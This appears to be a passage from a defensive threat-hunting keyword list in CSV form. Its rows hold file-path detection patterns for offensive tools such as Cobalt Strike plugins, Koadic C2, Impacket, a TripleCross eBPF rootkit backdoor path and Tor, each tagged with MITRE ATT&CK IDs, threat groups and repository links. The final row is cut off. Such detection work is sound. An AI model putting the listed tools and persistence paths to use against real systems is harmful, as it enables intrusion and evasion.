"*/enum_cisco.md*",".{0,1000}\/enum_cisco\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6957" "*/enum_dns.py*",".{0,1000}\/enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6958" "*/enum_domain_info*",".{0,1000}\/enum_domain_info.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","6959" "*/enum_f5.md*",".{0,1000}\/enum_f5\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6960" "*/enum_juniper.md*",".{0,1000}\/enum_juniper\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6961" "*/enum_osx.md*",".{0,1000}\/enum_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6962" "*/enum_proxy.md*",".{0,1000}\/enum_proxy\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6963" "*/enum_services.md*",".{0,1000}\/enum_services\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6964" "*/enum_shares.*",".{0,1000}\/enum_shares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6965" "*/enum_snmp.md*",".{0,1000}\/enum_snmp\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6966" "*/enum4linux.py*",".{0,1000}\/enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","#linux","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6967" "*/EnumCLR.c*",".{0,1000}\/EnumCLR\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6968" "*/enumerate.cna*",".{0,1000}\/enumerate\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - 
DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","6969" "*/enumerate/enumerate.py*",".{0,1000}\/enumerate\/enumerate\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","#linux","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","6970" "*/EnumerateDCs.ahk*",".{0,1000}\/EnumerateDCs\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6971" "*/enumeration/azureAd.py*",".{0,1000}\/enumeration\/azureAd\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6972" "*/enumeration/azureAzService.py*",".{0,1000}\/enumeration\/azureAzService\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6973" "*/enumeration/subdomain.py*",".{0,1000}\/enumeration\/subdomain\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6974" "*/enumeration/userenum.py*",".{0,1000}\/enumeration\/userenum\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","6975" "*/enumeration_process.exe*",".{0,1000}\/enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - 
TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6976" "*/epmd-info.nse*",".{0,1000}\/epmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6977" "*/eppc-enum-processes.nse*",".{0,1000}\/eppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6978" "*/Erebus/*.dll*",".{0,1000}\/Erebus\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","6985" "*/Erebus/*.exe*",".{0,1000}\/Erebus\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - 
CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","6986" "*/Erebus-email.*",".{0,1000}\/Erebus\-email\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","6987" "*/esentutl.py*",".{0,1000}\/esentutl\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6988" "*/etc/cron.d/ebpfbackdoor*",".{0,1000}\/etc\/cron\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","6991"
"*/etc/cron.weekly/tor*",".{0,1000}\/etc\/cron\.weekly\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attackers for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6992" "*/etc/default/tor",".{0,1000}\/etc\/default\/tor","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attackers for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6997" "*/etc/gsocket.conf*",".{0,1000}\/etc\/gsocket\.conf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other.
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7001" "*/etc/init.d/tor start*",".{0,1000}\/etc\/init\.d\/tor\sstart.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","7003" "*/etc/init.d/tor stop*",".{0,1000}\/etc\/init\.d\/tor\sstop.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","7004" "*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
